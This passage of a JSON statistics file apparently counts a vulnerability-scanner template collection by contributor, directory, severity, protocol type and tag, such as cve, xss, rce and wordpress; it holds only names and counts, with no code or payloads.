nentwig","count":2},{"name":"vsh00t","count":2},{"name":"smaranchand","count":2},{"name":"ehsahil","count":2},{"name":"parth","count":2},{"name":"afaq","count":2},{"name":"redteambrasil","count":2},{"name":"kiblyn11","count":2},{"name":"geekby","count":2},{"name":"0xsmiley","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"danielmofer","count":2},{"name":"thardt-praetorian","count":2},{"name":"koti2","count":2},{"name":"y4er","count":2},{"name":"randomrobbie","count":2},{"name":"0xrudra","count":2},{"name":"rafaelwdornelas","count":2},{"name":"luci","count":2},{"name":"r12w4n","count":2},{"name":"dahse89","count":2},{"name":"its0x08","count":2},{"name":"huowuzhao","count":2},{"name":"convisoappsec","count":2},{"name":"k11h-de","count":2},{"name":"mohammedsaneem","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"bing0o","count":2},{"name":"hassan khan yusufzai - splint3r7","count":2},{"name":"cocxanh","count":2},{"name":"dheerajmadhukar","count":2},{"name":"ambassify","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"bananabr","count":2},{"name":"pxmme1337","count":2},{"name":"ree4pwn","count":2},{"name":"taielab","count":2},{"name":"swissky","count":2},{"name":"0xprial","count":2},{"name":"x1m_martijn","count":2},{"name":"w4cky_","count":2},{"name":"lotusdll","count":2},{"name":"0xelkomy","count":2},{"name":"bsysop","count":2},{"name":"udit_thakkur","count":2},{"name":"bp0lr","count":2},{"name":"paradessia","count":2},{"name":"0xsapra","count":2},{"name":"foulenzer","count":2},{"name":"nkxxkn","count":2},{"name":"vavkamil","count":2},{"name":"gal nagli","count":2},{"name":"revblock","count":1},{"name":"mah3sec_","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"osamahamad","count":1},{"name":"schniggie","count":1},{"name":"deena","count":1},{"name":"pratik khalane","count":1},{"name":"ola456","count":1},{"name":"rodnt","count":1},{"name":"yashgoti","count":1},{"name":"sec_hawk","count":1},{"name":"alexrydzak","count":1},{"name":"soyelmago","count":1},{"name":"evan rubinstien","count":1},{"name":"juicypotato1","count":1},{"name":"thebinitghimire","count":1},{"name":"infosecsanyam","count":1},{"name":"xstp","count":1},{"name":"igibanez","count":1},{"name":"francescocarlucci","count":1},{"name":"exceed","count":1},{"name":"x6263","count":1},{"name":"0ut0fb4nd","count":1},{"name":"sshell","count":1},{"name":"shreyapohekar","count":1},{"name":"_darrenmartyn","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"hakluke","count":1},{"name":"patralos","count":1},{"name":"wabafet","count":1},{"name":"majidmc2","count":1},{"name":"0xd0ff9","count":1},{"name":"2rs3c","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"berkdusunur","count":1},{"name":"bad5ect0r","count":1},{"name":"harshinsecurity","count":1},{"name":"b0rn2r00t","count":1},{"name":"furkansenan","count":1},{"name":"p-l-","count":1},{"name":"absshax","count":1},{"name":"lethargynavigator","count":1},{"name":"breno_css","count":1},{"name":"fopina","count":1},{"name":"0xteles","count":1},{"name":"ohlinge","count":1},{"name":"cookiehanhoan","count":1},{"name":"rubina119","count":1},{"name":"ph33r","count":1},{"name":"phyr3wall","count":1},{"name":"zsusac","count":1},{"name":"prettyboyaaditya","count":1},{"name":"jeya seelan","count":1},{"name":"sherlocksecurity","count":1},{"name":"adrianmf","count":1},{"name":"retr0","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"0xtavian","count":1},{"name":"noobexploiter","count":1},{"name":"myztique","count":1},{"name":"ringo","count":1},{"name":"omarkurt","count":1},{"name":"charanrayudu","count":1},{"name":"zhenwarx","count":1},{"name":"th3.d1p4k","count":1},{"name":"xshuden","count":1},{"name":"oscarintherocks","count":1},{"name":"whynotke","count":1},{"name":"amnotacat","count":1},{"name":"opencirt","count":1},{"name":"dievus","count":1},{"name":"ofjaaah","count":1},{"name":"thezakman","count":1},{"name":"notsoevilweasel","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"brabbit10","count":1},{"name":"dawid-czarnecki","count":1},{"name":"udyz","count":1},{"name":"hanlaomo","count":1},{"name":"qlkwej","count":1},{"name":"jas37","count":1},{"name":"remonsec","count":1},{"name":"narluin","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"daffianfo","count":1},{"name":"act1on3","count":1},{"name":"akshansh","count":1},{"name":"thevillagehacker","count":1},{"name":"affix","count":1},{"name":"jeya.seelan","count":1},{"name":"push4d","count":1},{"name":"v0idc0de","count":1},{"name":"d0rkerdevil","count":1},{"name":"orpheus","count":1},{"name":"justmumu","count":1},{"name":"apt-mirror","count":1},{"name":"arr0way","count":1},{"name":"c3l3si4n","count":1},{"name":"prajiteshsingh","count":1},{"name":"pudsec","count":1},{"name":"luskabol","count":1},{"name":"petruknisme","count":1},{"name":"kaizensecurity","count":1},{"name":"makyotox","count":1},{"name":"mesaglio","count":1},{"name":"d4vy","count":1},{"name":"ooooooo_q","count":1},{"name":"toufik-airane","count":1},{"name":"exploitation","count":1},{"name":"_harleo","count":1},{"name":"clment cruchet","count":1},{"name":"kabirsuda","count":1},{"name":"intx0x80","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"0xrod","count":1},{"name":"xeldax","count":1},{"name":"3th1c_yuk1","count":1},{"name":"duty_1g","count":1},{"name":"shelld3v","count":1},{"name":"kurohost","count":1},{"name":"tirtha","count":1},{"name":"s1r1u5_","count":1},{"name":"luqmaan hadia","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"yashanand155","count":1},{"name":"rschio","count":1},{"name":"kailashbohara","count":1},{"name":"alevsk","count":1},{"name":"miroslavsotak","count":1},{"name":"tim_koopmans","count":1},{"name":"jrolf","count":1},{"name":"un-fmunozs","count":1},{"name":"daviey","count":1},{"name":"kiks7","count":1},{"name":"philippdelteil","count":1},{"name":"bernardo rodrigues @bernardofsr | andrรฉ monteiro @am0nt31r0","count":1},{"name":"tea","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"akash.c","count":1},{"name":"kareemse1im","count":1},{"name":"jteles","count":1},{"name":"compr00t","count":1},{"name":"0xceeb","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"luqman","count":1},{"name":"manuelbua","count":1},{"name":"0xh7ml","count":1},{"name":"noamrathaus","count":1},{"name":"andirrahmani1","count":1},{"name":"mrcl0wnlab","count":1},{"name":"nerrorsec","count":1},{"name":"f1she3","count":1},{"name":"b0yd","count":1},{"name":"yuansec","count":1},{"name":"jbaines-r7","count":1},{"name":"elmahdi","count":1},{"name":"mhdsamx","count":1},{"name":"aresx","count":1},{"name":"micha3lb3n","count":1},{"name":"_c0wb0y_","count":1},{"name":"aaronchen0","count":1},{"name":"bartu utku sarp","count":1},{"name":"florianmaak","count":1},{"name":"nytr0gen","count":1},{"name":"sickwell","count":1},{"name":"momen eldawakhly","count":1},{"name":"lark lab","count":1},{"name":"ilovebinbash","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"bjhulst","count":1},{"name":"ahmed sherif","count":1},{"name":"geraldino2","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"andysvints","count":1},{"name":"ldionmarcil","count":1},{"name":"j33n1k4","count":1},{"name":"shifacyclewla","count":1},{"name":"thesubtlety","count":1},{"name":"arall","count":1},{"name":"skylark-lab","count":1},{"name":"clarkvoss","count":1},{"name":"streetofhackerr007","count":1},{"name":"rojanrijal","count":1},{"name":"retr02332","count":1},{"name":"husain","count":1},{"name":"ok_bye_now","count":1},{"name":"exid","count":1},{"name":"elouhi","count":1},{"name":"official_blackhat13","count":1},{"name":"alex","count":1},{"name":"nielsing","count":1},{"name":"chron0x","count":1},{"name":"fmunozs","count":1},{"name":"ggranjus","count":1},{"name":"gboddin","count":1},{"name":"ipanda","count":1},{"name":"evolutionsec","count":1},{"name":"borna nematzadeh","count":1},{"name":"sicksec","count":1},{"name":"pdp","count":1},{"name":"dhiyaneshdki","count":1},{"name":"mass0ma","count":1},{"name":"furkansayim","count":1},{"name":"0xceba","count":1},{"name":"higor melgaรงo (eremit4)","count":1},{"name":"izn0u","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"alperenkesk","count":1},{"name":"undefl0w","count":1},{"name":"becivells","count":1},{"name":"flag007","count":1},{"name":"fq_hsu","count":1},{"name":"ahmetpergamum","count":1},{"name":"coldfish","count":1},{"name":"zandros0","count":1},{"name":"willd96","count":1},{"name":"elder tao","count":1},{"name":"anon-artist","count":1},{"name":"knassar702","count":1},{"name":"0h1in9e","count":1},{"name":"blckraven","count":1},{"name":"hexcat","count":1},{"name":"rotemreiss","count":1},{"name":"tirtha_mandal","count":1},{"name":"ahmed abou-ela","count":1},{"name":"bughuntersurya","count":1},{"name":"jiheon-dev","count":1},{"name":"iampritam","count":1},{"name":"brenocss","count":1},{"name":"korteke","count":1},{"name":"co0nan","count":1},{"name":"regala_","count":1},{"name":"0ri2n","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"droberson","count":1},{"name":"b4uh0lz","count":1},{"name":"zinminphy0","count":1},{"name":"vzamanillo","count":1},{"name":"mubassirpatel","count":1},{"name":"manasmbellani","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"yavolo","count":1},{"name":"notnotnotveg","count":1},{"name":"wlayzz","count":1}],"directory":[{"name":"cves","count":1160},{"name":"exposed-panels","count":523},{"name":"vulnerabilities","count":452},{"name":"technologies","count":255},{"name":"exposures","count":204},{"name":"misconfiguration","count":197},{"name":"workflows","count":186},{"name":"token-spray","count":154},{"name":"default-logins","count":95},{"name":"file","count":68},{"name":"takeovers","count":67},{"name":"iot","count":38},{"name":"network","count":35},{"name":"miscellaneous","count":23},{"name":"cnvd","count":22},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"headless","count":6},{"name":"ssl","count":4}],"severity":[{"name":"info","count":1192},{"name":"high","count":874},{"name":"medium","count":662},{"name":"critical","count":414},{"name":"low","count":183},{"name":"unknown","count":6}],"types":[{"name":"http","count":3187},{"name":"file","count":68},{"name":"network","count":50},{"name":"dns","count":17}]}
+{"tags":[{"name":"cve","count":1430},{"name":"panel","count":655},{"name":"edb","count":563},{"name":"lfi","count":509},{"name":"xss","count":491},{"name":"wordpress","count":419},{"name":"exposure","count":407},{"name":"cve2021","count":352},{"name":"rce","count":337},{"name":"wp-plugin","count":316},{"name":"tech","count":295},{"name":"packetstorm","count":276},{"name":"token-spray","count":230},{"name":"cve2020","count":214},{"name":"wpscan","count":212},{"name":"","count":194},{"name":"cve2022","count":184},{"name":"unauth","count":158},{"name":"config","count":147},{"name":"cve2018","count":144},{"name":"kev","count":141},{"name":"cve2019","count":135},{"name":"wp","count":134},{"name":"joomla","count":133},{"name":"apache","count":123},{"name":"default-login","count":118},{"name":"iot","count":116},{"name":"oast","count":112},{"name":"cve2010","count":111},{"name":"misconfig","count":107},{"name":"sqli","count":95},{"name":"authenticated","count":90},{"name":"login","count":87},{"name":"redirect","count":87},{"name":"router","count":84},{"name":"takeover","count":74},{"name":"token","count":72},{"name":"devops","count":71},{"name":"ssrf","count":69},{"name":"cve2017","count":67},{"name":"file","count":60},{"name":"auth-bypass","count":59},{"name":"oracle","count":57},{"name":"intrusive","count":56},{"name":"network","count":55},{"name":"cms","count":55},{"name":"disclosure","count":53},{"name":"seclists","count":51},{"name":"cve2016","count":48},{"name":"cisco","count":47},{"name":"cve2015","count":46},{"name":"google","count":46},{"name":"fileupload","count":44},{"name":"plugin","count":41},{"name":"cve2014","count":41},{"name":"adobe","count":40},{"name":"oss","count":39},{"name":"aem","count":36},{"name":"vulhub","count":36},{"name":"logs","count":36},{"name":"vmware","count":35},{"name":"traversal","count":35},{"name":"atlassian","count":34},{"name":"tenable","count":33},{"name":"injection","count":33},{"name":"listing","count":31},{"name":"hackerone","count":31},{"name":"jira","count":31},{"name":"springboot","count":28},{"name":"generic","count":28},{"name":"dns","count":27},{"name":"kubernetes","count":27},{"name":"huntr","count":27},{"name":"sap","count":25},{"name":"cnvd","count":25},{"name":"log4j","count":25},{"name":"microsoft","count":23},{"name":"proxy","count":23},{"name":"debug","count":22},{"name":"jndi","count":22},{"name":"wp-theme","count":21},{"name":"manageengine","count":21},{"name":"zoho","count":21},{"name":"misc","count":21},{"name":"cve2012","count":20},{"name":"aws","count":20},{"name":"fuzz","count":20},{"name":"weblogic","count":19},{"name":"tomcat","count":19},{"name":"php","count":19},{"name":"deserialization","count":19},{"name":"api","count":18},{"name":"ibm","count":18},{"name":"k8s","count":18},{"name":"camera","count":18},{"name":"dlink","count":18},{"name":"service","count":18},{"name":"jenkins","count":17},{"name":"cloud","count":17},{"name":"wavlink","count":17},{"name":"cicd","count":16},{"name":"struts","count":16},{"name":"xxe","count":15},{"name":"cve2011","count":15},{"name":"gitlab","count":15},{"name":"firewall","count":15},{"name":"cve2009","count":15},{"name":"domainmod","count":14},{"name":"hp","count":14},{"name":"printer","count":14},{"name":"java","count":14},{"name":"android","count":14},{"name":"ruijie","count":13},{"name":"cve2013","count":13},{"name":"abstractapi","count":13},{"name":"msf","count":13},{"name":"lfr","count":13},{"name":"status","count":12},{"name":"magento","count":12},{"name":"netgear","count":12},{"name":"drupal","count":12},{"name":"netsweeper","count":12},{"name":"graphql","count":12},{"name":"ftp","count":12},{"name":"confluence","count":12},{"name":"rails","count":12},{"name":"nginx","count":12},{"name":"glpi","count":11},{"name":"cnvd2021","count":11},{"name":"cisa","count":11},{"name":"amazon","count":11},{"name":"azure","count":11},{"name":"microweber","count":11},{"name":"airflow","count":11},{"name":"cve2008","count":11},{"name":"backup","count":11},{"name":"woocommerce","count":11},{"name":"grafana","count":10},{"name":"github","count":10},{"name":"jolokia","count":10},{"name":"spring","count":10},{"name":"dell","count":10},{"name":"coldfusion","count":10},{"name":"fortigate","count":10},{"name":"zyxel","count":10},{"name":"django","count":10},{"name":"backdoor","count":9},{"name":"iis","count":9},{"name":"fastjson","count":9},{"name":"wso2","count":9},{"name":"mirai","count":9},{"name":"laravel","count":9},{"name":"windows","count":9},{"name":"vcenter","count":9},{"name":"webserver","count":9},{"name":"ruby","count":9},{"name":"kube","count":9},{"name":"dedecms","count":9},{"name":"phpmyadmin","count":9},{"name":"prometheus","count":9},{"name":"auth","count":9},{"name":"zabbix","count":9},{"name":"fortinet","count":9},{"name":"vpn","count":8},{"name":"cisco-switch","count":8},{"name":"scada","count":8},{"name":"sonicwall","count":8},{"name":"recon","count":8},{"name":"git","count":8},{"name":"jboss","count":8},{"name":"config-audit","count":8},{"name":"citrix","count":8},{"name":"ssti","count":8},{"name":"metadata","count":8},{"name":"headless","count":8},{"name":"zimbra","count":8},{"name":"kafka","count":8},{"name":"elasticsearch","count":8},{"name":"blind","count":8},{"name":"audit","count":8},{"name":"solr","count":8},{"name":"ssl","count":8},{"name":"cnvd2020","count":7},{"name":"exchange","count":7},{"name":"mail","count":7},{"name":"python","count":7},{"name":"firebase","count":7},{"name":"jetbrains","count":7},{"name":"icewarp","count":7},{"name":"solarview","count":7},{"name":"druid","count":7},{"name":"bucket","count":7},{"name":"files","count":7},{"name":"symfony","count":7},{"name":"maps","count":7},{"name":"docker","count":7},{"name":"squirrelmail","count":7},{"name":"samsung","count":6},{"name":"jetty","count":6},{"name":"fpd","count":6},{"name":"setup","count":6},{"name":"artica","count":6},{"name":"ecology","count":6},{"name":"go","count":6},{"name":"ognl","count":6},{"name":"bypass","count":6},{"name":"ofbiz","count":6},{"name":"crlf","count":6},{"name":"sitecore","count":6},{"name":"huawei","count":6},{"name":"zhiyuan","count":6},{"name":"rconfig","count":6},{"name":"kubelet","count":6},{"name":"cobbler","count":6},{"name":"slack","count":6},{"name":"enum","count":6},{"name":"bigip","count":6},{"name":"lucee","count":6},{"name":"npm","count":6},{"name":"nodejs","count":6},{"name":"seeyon","count":6},{"name":"magmi","count":6},{"name":"websphere","count":6},{"name":"liferay","count":6},{"name":"vms","count":6},{"name":"emerge","count":6},{"name":"firmware","count":5},{"name":"avideo","count":5},{"name":"elfinder","count":5},{"name":"cockpit","count":5},{"name":"solarwinds","count":5},{"name":"scan","count":5},{"name":"carrental","count":5},{"name":"apisix","count":5},{"name":"minio","count":5},{"name":"alibaba","count":5},{"name":"node","count":5},{"name":"storage","count":5},{"name":"opensis","count":5},{"name":"rfi","count":5},{"name":"ssh","count":5},{"name":"gogs","count":5},{"name":"plesk","count":5},{"name":"moodle","count":5},{"name":"circarlife","count":5},{"name":"thinkphp","count":5},{"name":"gocd","count":5},{"name":"fatpipe","count":5},{"name":"metinfo","count":5},{"name":"keycloak","count":5},{"name":"nagios","count":5},{"name":"symantec","count":5},{"name":"jamf","count":5},{"name":"leak","count":5},{"name":"error","count":5},{"name":"strapi","count":5},{"name":"cache","count":5},{"name":"74cms","count":5},{"name":"rseenet","count":5},{"name":"awstats","count":4},{"name":"xmlrpc","count":4},{"name":"resin","count":4},{"name":"gnuboard","count":4},{"name":"hpe","count":4},{"name":"oauth","count":4},{"name":"terramaster","count":4},{"name":"cacti","count":4},{"name":"sonarqube","count":4},{"name":"vrealize","count":4},{"name":"jellyfin","count":4},{"name":"telerik","count":4},{"name":"phpinfo","count":4},{"name":"hybris","count":4},{"name":"filemanager","count":4},{"name":"adminer","count":4},{"name":"search","count":4},{"name":"hashicorp","count":4},{"name":"phppgadmin","count":4},{"name":"install","count":4},{"name":"hikvision","count":4},{"name":"caucho","count":4},{"name":"flink","count":4},{"name":"yeswiki","count":4},{"name":"aspose","count":4},{"name":"database","count":4},{"name":"puppet","count":4},{"name":"wcs","count":4},{"name":"kevinlab","count":4},{"name":"vbulletin","count":4},{"name":"panos","count":4},{"name":"telesquare","count":4},{"name":"hoteldruid","count":4},{"name":"hongdian","count":4},{"name":"beyondtrust","count":4},{"name":"sql","count":4},{"name":"photo","count":4},{"name":"mailchimp","count":4},{"name":"asp","count":4},{"name":"stripe","count":4},{"name":"cnvd2019","count":4},{"name":"royalevent","count":4},{"name":"activemq","count":4},{"name":"couchdb","count":4},{"name":"mongodb","count":4},{"name":"springcloud","count":4},{"name":"kibana","count":4},{"name":"elastic","count":4},{"name":"sangfor","count":4},{"name":"smtp","count":4},{"name":"voip","count":4},{"name":"thinkcmf","count":4},{"name":"tikiwiki","count":4},{"name":"db","count":4},{"name":"parallels","count":4},{"name":"sophos","count":4},{"name":"cve2007","count":4},{"name":"redis","count":4},{"name":"redmine","count":4},{"name":"horde","count":4},{"name":"nexus","count":4},{"name":"paypal","count":4},{"name":"roxy","count":4},{"name":"openemr","count":4},{"name":"oa","count":4},{"name":"prestashop","count":4},{"name":"artifactory","count":4},{"name":"postmessage","count":4},{"name":"microstrategy","count":4},{"name":"ems","count":4},{"name":"servicenow","count":3},{"name":"ivanti","count":3},{"name":"webmail","count":3},{"name":"sendgrid","count":3},{"name":"lansweeper","count":3},{"name":"tenda","count":3},{"name":"messaging","count":3},{"name":"splunk","count":3},{"name":"targa","count":3},{"name":"linkerd","count":3},{"name":"ec2","count":3},{"name":"zte","count":3},{"name":"drawio","count":3},{"name":"hsphere","count":3},{"name":"umbraco","count":3},{"name":"buffalo","count":3},{"name":"elementor","count":3},{"name":"intercom","count":3},{"name":"netlify","count":3},{"name":"thruk","count":3},{"name":"kingsoft","count":3},{"name":"synology","count":3},{"name":"sharepoint","count":3},{"name":"glassfish","count":3},{"name":"samba","count":3},{"name":"mcafee","count":3},{"name":"microfocus","count":3},{"name":"bruteforce","count":3},{"name":"digitalocean","count":3},{"name":"r-seenet","count":3},{"name":"kentico","count":3},{"name":"digitalrebar","count":3},{"name":"aptus","count":3},{"name":"circleci","count":3},{"name":"prtg","count":3},{"name":"linksys","count":3},{"name":"selea","count":3},{"name":"nuuo","count":3},{"name":"sugarcrm","count":3},{"name":"omnia","count":3},{"name":"graylog","count":3},{"name":"nacos","count":3},{"name":"globalprotect","count":3},{"name":"pip","count":3},{"name":"trendnet","count":3},{"name":"webadmin","count":3},{"name":"cve2005","count":3},{"name":"panabit","count":3},{"name":"jfrog","count":3},{"name":"httpd","count":3},{"name":"fortios","count":3},{"name":"exposures","count":3},{"name":"dotcms","count":3},{"name":"netdata","count":3},{"name":"epson","count":3},{"name":"wordfence","count":3},{"name":"consul","count":3},{"name":"heroku","count":3},{"name":"thinfinity","count":3},{"name":"metabase","count":3},{"name":"s3","count":3},{"name":"kkfileview","count":3},{"name":"openbmcs","count":3},{"name":"smb","count":3},{"name":"axis2","count":3},{"name":"nosqli","count":3},{"name":"workspaceone","count":3},{"name":"blockchain","count":3},{"name":"ampps","count":3},{"name":"log","count":3},{"name":"lotus","count":3},{"name":"sentry","count":3},{"name":"bigant","count":3},{"name":"rackn","count":3},{"name":"bitrix","count":3},{"name":"matrix","count":3},{"name":"axis","count":3},{"name":"rlm","count":3},{"name":"centos","count":3},{"name":"openam","count":3},{"name":"geowebserver","count":3},{"name":"grav","count":3},{"name":"actuator","count":3},{"name":"empirecms","count":3},{"name":"jeesns","count":3},{"name":"teamcity","count":3},{"name":"subrion","count":3},{"name":"voipmonitor","count":3},{"name":"geoserver","count":3},{"name":"concrete","count":3},{"name":"weiphp","count":3},{"name":"axigen","count":3},{"name":"fileman","count":3},{"name":"tableau","count":3},{"name":"pentaho","count":3},{"name":"movable","count":3},{"name":"ebs","count":3},{"name":"httpbin","count":3},{"name":"dom","count":3},{"name":"dolibarr","count":3},{"name":"mobileiron","count":3},{"name":"javascript","count":3},{"name":"dreambox","count":3},{"name":"nortek","count":3},{"name":"facebook","count":3},{"name":"square","count":3},{"name":"zeroshell","count":3},{"name":"octobercms","count":3},{"name":"mongo","count":3},{"name":"seagate","count":3},{"name":"odoo","count":3},{"name":"jupyter","count":3},{"name":"technology","count":3},{"name":"modem","count":3},{"name":"finecms","count":3},{"name":"graph","count":3},{"name":"3cx","count":3},{"name":"trixbox","count":3},{"name":"fanruan","count":3},{"name":"goanywhere","count":3},{"name":"fuelcms","count":3},{"name":"dzzoffice","count":3},{"name":"cloudflare","count":3},{"name":"getsimple","count":3},{"name":"netis","count":2},{"name":"nextjs","count":2},{"name":"phpstorm","count":2},{"name":"hubspot","count":2},{"name":"ericsson","count":2},{"name":"iptime","count":2},{"name":"impresscms","count":2},{"name":"books","count":2},{"name":"netsus","count":2},{"name":"avaya","count":2},{"name":"openssh","count":2},{"name":"appcms","count":2},{"name":"mbean","count":2},{"name":"netscaler","count":2},{"name":"servicedesk","count":2},{"name":"livezilla","count":2},{"name":"dubbo","count":2},{"name":"eris","count":2},{"name":"xoops","count":2},{"name":"influxdb","count":2},{"name":"virtua","count":2},{"name":"hasura","count":2},{"name":"erxes","count":2},{"name":"kavita","count":2},{"name":"justwriting","count":2},{"name":"couchbase","count":2},{"name":"typo3","count":2},{"name":"conductor","count":2},{"name":"linkedin","count":2},{"name":"xweb500","count":2},{"name":"seacms","count":2},{"name":"seeddms","count":2},{"name":"rocketchat","count":2},{"name":"intellian","count":2},{"name":"jeedom","count":2},{"name":"pascom","count":2},{"name":"teampass","count":2},{"name":"supermicro","count":2},{"name":"wooyun","count":2},{"name":"j2ee","count":2},{"name":"mantisbt","count":2},{"name":"rosariosis","count":2},{"name":"pmb","count":2},{"name":"natshell","count":2},{"name":"froxlor","count":2},{"name":"scriptcase","count":2},{"name":"webcam","count":2},{"name":"syslog","count":2},{"name":"seowon","count":2},{"name":"password","count":2},{"name":"wuzhicms","count":2},{"name":"waf","count":2},{"name":"contao","count":2},{"name":"redhat","count":2},{"name":"payara","count":2},{"name":"weather","count":2},{"name":"virtualui","count":2},{"name":"gophish","count":2},{"name":"xceedium","count":2},{"name":"mailgun","count":2},{"name":"homematic","count":2},{"name":"backups","count":2},{"name":"xerox","count":2},{"name":"globaldomains","count":2},{"name":"listserv","count":2},{"name":"rabbitmq","count":2},{"name":"commax","count":2},{"name":"akamai","count":2},{"name":"atmail","count":2},{"name":"nasos","count":2},{"name":"clansphere","count":2},{"name":"traefik","count":2},{"name":"aviatrix","count":2},{"name":"csrf","count":2},{"name":"rstudio","count":2},{"name":"rundeck","count":2},{"name":"chamilo","count":2},{"name":"dos","count":2},{"name":"hiveos","count":2},{"name":"ilo","count":2},{"name":"xsuite","count":2},{"name":"tileserver","count":2},{"name":"node-red-dashboard","count":2},{"name":"gitbook","count":2},{"name":"oidc","count":2},{"name":"arcgis","count":2},{"name":"ixcache","count":2},{"name":"chiyu","count":2},{"name":"wamp","count":2},{"name":"craftcms","count":2},{"name":"kettle","count":2},{"name":"unifi","count":2},{"name":"livehelperchat","count":2},{"name":"veeam","count":2},{"name":"showdoc","count":2},{"name":"zend","count":2},{"name":"dvwa","count":2},{"name":"ghost","count":2},{"name":"audiocodes","count":2},{"name":"yapi","count":2},{"name":"cyberoam","count":2},{"name":"owasp","count":2},{"name":"labkey","count":2},{"name":"openvpn","count":2},{"name":"chyrp","count":2},{"name":"h3c","count":2},{"name":"redash","count":2},{"name":"eventum","count":2},{"name":"angular","count":2},{"name":"bomgar","count":2},{"name":"ebook","count":2},{"name":"electron","count":2},{"name":"plastic","count":2},{"name":"igs","count":2},{"name":"otobo","count":2},{"name":"openresty","count":2},{"name":"wpqa","count":2},{"name":"text","count":2},{"name":"pulse","count":2},{"name":"hjtcloud","count":2},{"name":"pfsense","count":2},{"name":"landesk","count":2},{"name":"dotnetnuke","count":2},{"name":"fiori","count":2},{"name":"auerswald","count":2},{"name":"avantfax","count":2},{"name":"swagger","count":2},{"name":"gespage","count":2},{"name":"vidyo","count":2},{"name":"openwrt","count":2},{"name":"reolink","count":2},{"name":"loytec","count":2},{"name":"acrolinx","count":2},{"name":"forum","count":2},{"name":"circontrol","count":2},{"name":"favicon","count":2},{"name":"kong","count":2},{"name":"apollo","count":2},{"name":"resourcespace","count":2},{"name":"gitlist","count":2},{"name":"smartstore","count":2},{"name":"harbor","count":2},{"name":"saltstack","count":2},{"name":"flir","count":2},{"name":"cloudinary","count":2},{"name":"pcoip","count":2},{"name":"lighttpd","count":2},{"name":"sidekiq","count":2},{"name":"osticket","count":2},{"name":"checkpoint","count":2},{"name":"accela","count":2},{"name":"ranger","count":2},{"name":"phpcollab","count":2},{"name":"forcepoint","count":2},{"name":"airtame","count":2},{"name":"cgi","count":2},{"name":"neos","count":2},{"name":"konga","count":2},{"name":"watchguard","count":2},{"name":"azkaban","count":2},{"name":"f5","count":2},{"name":"eyesofnetwork","count":2},{"name":"qnap","count":2},{"name":"ametys","count":2},{"name":"itop","count":2},{"name":"avtech","count":2},{"name":"hostheader-injection","count":2},{"name":"pbootcms","count":2},{"name":"skycaiji","count":2},{"name":"ecoa","count":2},{"name":"docs","count":2},{"name":"ucmdb","count":2},{"name":"nextcloud","count":2},{"name":"hadoop","count":2},{"name":"middleware","count":2},{"name":"sqlite","count":2},{"name":"eprints","count":2},{"name":"dynamicweb","count":2},{"name":"cocoon","count":2},{"name":"domxss","count":2},{"name":"twitter","count":2},{"name":"gitea","count":2},{"name":"phpshowtime","count":2},{"name":"terraform","count":2},{"name":"mida","count":2},{"name":"wwbn","count":2},{"name":"sequoiadb","count":2},{"name":"glances","count":2},{"name":"flightpath","count":2},{"name":"tidb","count":2},{"name":"octoprint","count":2},{"name":"pam","count":2},{"name":"uwsgi","count":2},{"name":"hms","count":2},{"name":"corebos","count":2},{"name":"horizon","count":2},{"name":"graphite","count":2},{"name":"mysql","count":2},{"name":"xxljob","count":2},{"name":"carel","count":2},{"name":"fastcgi","count":2},{"name":"alienvault","count":2},{"name":"orchid","count":2},{"name":"vigorconnect","count":2},{"name":"maian","count":2},{"name":"tapestry","count":2},{"name":"jsf","count":2},{"name":"embed","count":2},{"name":"frp","count":2},{"name":"linux","count":2},{"name":"tongda","count":2},{"name":"aruba","count":2},{"name":"projectsend","count":2},{"name":"rockmongo","count":2},{"name":"codeigniter","count":2},{"name":"pega","count":2},{"name":"idor","count":2},{"name":"idrac","count":2},{"name":"jquery","count":2},{"name":"versa","count":2},{"name":"idea","count":2},{"name":"xampp","count":2},{"name":"rackstation","count":2},{"name":"jmx","count":2},{"name":"shellshock","count":2},{"name":"motorola","count":2},{"name":"key","count":2},{"name":"pacsone","count":2},{"name":"casdoor","count":2},{"name":"webalizer","count":2},{"name":"gryphon","count":2},{"name":"qcubed","count":2},{"name":"jitsi","count":2},{"name":"emqx","count":2},{"name":"wildfly","count":2},{"name":"fortiweb","count":2},{"name":"openstack","count":2},{"name":"sdwan","count":2},{"name":"draytek","count":2},{"name":"qihang","count":2},{"name":"emby","count":2},{"name":"webmin","count":2},{"name":"overflow","count":2},{"name":"places","count":2},{"name":"gradle","count":2},{"name":"zerof","count":2},{"name":"ambari","count":2},{"name":"cve2006","count":2},{"name":"dvr","count":2},{"name":"dotnet","count":2},{"name":"akkadian","count":2},{"name":"zms","count":2},{"name":"sas","count":2},{"name":"clusterengine","count":2},{"name":"bmc","count":2},{"name":"kiwitcms","count":2},{"name":"zblogphp","count":2},{"name":"ansible","count":2},{"name":"rancher","count":2},{"name":"upload","count":2},{"name":"sysaid","count":2},{"name":"yii","count":2},{"name":"ad","count":2},{"name":"pgadmin","count":2},{"name":"lantronix","count":2},{"name":"ubnt","count":2},{"name":"viewpoint","count":2},{"name":"guacamole","count":2},{"name":"mybb","count":2},{"name":"avada","count":2},{"name":"adiscon","count":2},{"name":"javamelody","count":2},{"name":"cas","count":2},{"name":"sniplets","count":2},{"name":"yonyou","count":2},{"name":"apereo","count":2},{"name":"myfactory","count":2},{"name":"frontpage","count":2},{"name":"zzzcms","count":2},{"name":"shenyu","count":2},{"name":"openfire","count":2},{"name":"spark","count":2},{"name":"synopsys","count":2},{"name":"metersphere","count":2},{"name":"ovirt","count":2},{"name":"alfresco","count":2},{"name":"netflix","count":2},{"name":"secret","count":2},{"name":"fortimail","count":2}